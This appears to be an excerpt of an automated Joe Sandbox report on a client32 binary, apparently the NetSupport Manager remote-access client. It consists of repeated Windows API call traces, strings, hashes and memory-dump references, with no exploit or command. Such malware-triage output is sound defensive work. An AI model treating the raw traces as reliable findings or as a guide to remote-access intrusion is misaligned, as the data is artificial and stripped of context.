                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: QueryValuewsprintf
                                                                                                                                                                                                    • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                                                                                                                    • API String ID: 2072284396-1346142259
                                                                                                                                                                                                    • Opcode ID: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
                                                                                                                                                                                                    • Instruction ID: 40dd4717f0c7ad5754e433c7b85868c8d74bcde588045e86a78ebe46af68b9ce
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01418F75D022299EEB11DF50CC94BEEF7B4EB45318F0445E8E91AA7281EB34AB44CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • DoICFConfig() OK, xrefs: 11135C96
                                                                                                                                                                                                    • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 11135CAC
                                                                                                                                                                                                    • Client, xrefs: 11135C15
                                                                                                                                                                                                    • AutoICFConfig, xrefs: 11135C10
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick
                                                                                                                                                                                                    • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                                                                                                                                    • API String ID: 536389180-1512301160
                                                                                                                                                                                                    • Opcode ID: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
                                                                                                                                                                                                    • Instruction ID: e3d06188695ac204c7c53c5cb05177b21b7d5d04c4fed9e193d22ae282c8029d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D021E770A213A64EFF938AE5DD84765FE895780FAEF004139D420956CCE7749480DF56
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetProcessImageFileNameA), ref: 110259F6
                                                                                                                                                                                                    • K32GetProcessImageFileNameA.KERNEL32(?,?,?), ref: 11025A12
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025A26
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11025A49
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                                                                                                                                    • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                                                                                                                                    • API String ID: 4186647306-532032230
                                                                                                                                                                                                    • Opcode ID: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
                                                                                                                                                                                                    • Instruction ID: 68c8d787ea85bb7251c32f91647a1931aca61929af41b034d7bc2fd00ab8f334
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46018036A41315AFD321DF69EC84F8BB7E8EB89765F10452AF986D7600D631E800CBB4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,689D0F2B,05C2A5B0,00000000,?,?,689EF278,000000FF,?,689BAE0A,?,00000000,?,00000080), ref: 689D0D48
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 689D0D5B
                                                                                                                                                                                                    • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,689EF278,000000FF,?,689BAE0A,?,00000000,?), ref: 689D0D9F
                                                                                                                                                                                                    • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-689FCB4C,?,?,689EF278,000000FF,?,689BAE0A,?,00000000,?,00000080), ref: 689D0D76
                                                                                                                                                                                                      • Part of subcall function 689D1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 689D1C13
                                                                                                                                                                                                      • Part of subcall function 689D1BFD: GetLastError.KERNEL32(00000000), ref: 689D1C25
                                                                                                                                                                                                      • Part of subcall function 689D1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,689DD3C1,689D6E81,00000001,689D6E81,?,689DF447,00000018,689F7738,0000000C,689DF4D7), ref: 689D1BAE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdaptersAddressesHeap$AddressAllocateErrorFreeLastLibraryLoadProc
                                                                                                                                                                                                    • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                                                                                                                                    • API String ID: 2394954111-1843585929
                                                                                                                                                                                                    • Opcode ID: e0f8fe5c36ae146471523b9b4d4d104755e36d9cc7fb98f8801aa58076b3a4af
                                                                                                                                                                                                    • Instruction ID: b55cf347e4de1928d1e3cc2ad26babab63ccc2e4934690c5ecfe5fbcef085efa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0f8fe5c36ae146471523b9b4d4d104755e36d9cc7fb98f8801aa58076b3a4af
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C01D4B6600B016BE7248B709C85F6B76ACAF91B04F50882DF9669F680EA75F441C728
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,771CC310,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF), ref: 1110C2C7
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,1110D1D5,00000001,00000000,00000000,0000000C), ref: 1110C2EA
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C317
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C321
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                                                                                                                    • API String ID: 3360349984-1136101629
                                                                                                                                                                                                    • Opcode ID: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
                                                                                                                                                                                                    • Instruction ID: a3115959ccdc6595f724f67194249590caf2e9fcdd86f69c2c7dc21ad5a21c7d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D01D4367403126FE7208E99DC89F4BBBA8EB54765F108128FA15876C0DA70E404CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                                    • String ID: %s%s%s.bin$141700$_HF$_HW$_SW
                                                                                                                                                                                                    • API String ID: 2111968516-4139989726
                                                                                                                                                                                                    • Opcode ID: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
                                                                                                                                                                                                    • Instruction ID: fca8ef28a5c1b47a0d785ddae3209236aee7f502678e08843e7b704547fe2850
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5E09BA0D2060C5FF3005159AC01BAFBBAC1F4434AF80C0D0FEE9A6A82E974944086D5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689C6950
                                                                                                                                                                                                      • Part of subcall function 689BA4E0: EnterCriticalSection.KERNEL32(689FB898,00000000,?,?,?,689BDA7F,?,00000000), ref: 689BA503
                                                                                                                                                                                                      • Part of subcall function 689BA4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 689BA568
                                                                                                                                                                                                      • Part of subcall function 689BA4E0: Sleep.KERNEL32(00000000,?,689BDA7F,?,00000000), ref: 689BA581
                                                                                                                                                                                                      • Part of subcall function 689BA4E0: LeaveCriticalSection.KERNEL32(689FB898,00000000), ref: 689BA5B3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick
                                                                                                                                                                                                    • String ID: 1.2$Channel$Client$Publish %d pending services
                                                                                                                                                                                                    • API String ID: 1409162668-1140593649
                                                                                                                                                                                                    • Opcode ID: 64d6e6e9a183a7123912247133b487cee1b0dd00fb61be8f67563a822499ecf4
                                                                                                                                                                                                    • Instruction ID: 210dbce4b8b058647fad522ef0cb981dad70229e231391c7e7d005a291c86b25
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64d6e6e9a183a7123912247133b487cee1b0dd00fb61be8f67563a822499ecf4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE512635A082159FDB1ACF78EA4077E37B8AB9630CF90852DD961D3281DB32E545CB93
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11061908
                                                                                                                                                                                                    • CheckLicenseString.PCICHEK(00000000,00000000), ref: 1106191B
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1106193F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CheckCountLicenseStringTickwsprintf
                                                                                                                                                                                                    • String ID: _License
                                                                                                                                                                                                    • API String ID: 1965704701-3969723640
                                                                                                                                                                                                    • Opcode ID: 57eb07912173b09d2d6a718f612a6a8b2fea9b3332f7ae0c9a2918cf08a18aab
                                                                                                                                                                                                    • Instruction ID: 96a77fb98c0223eb2b4e36b27f4c2e587a44f0df050ee6f7a48cce7550f15376
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57eb07912173b09d2d6a718f612a6a8b2fea9b3332f7ae0c9a2918cf08a18aab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7341E275C0465A9FDB11CF648C40BEABBFDAF49349F0481D5E889E3241E732AA46CF60
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 110FFD13
                                                                                                                                                                                                    • GetStockObject.GDI32(00000004), ref: 110FFD6B
                                                                                                                                                                                                    • RegisterClassA.USER32(?), ref: 110FFD7F
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 110FFDBC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                                                                                                                    • String ID: NSMDesktopWnd
                                                                                                                                                                                                    • API String ID: 2669163067-206650970
                                                                                                                                                                                                    • Opcode ID: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
                                                                                                                                                                                                    • Instruction ID: e76810456149084fb848040635d8e5dd78421bccde4647aa26b9c0cc0d967c72
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0231F7B5D01259AFCB41DFA9D880A9EFBF8FB09314F50862EE569E3240E7345940CF95
                                                                                                                                                                                                    APIs
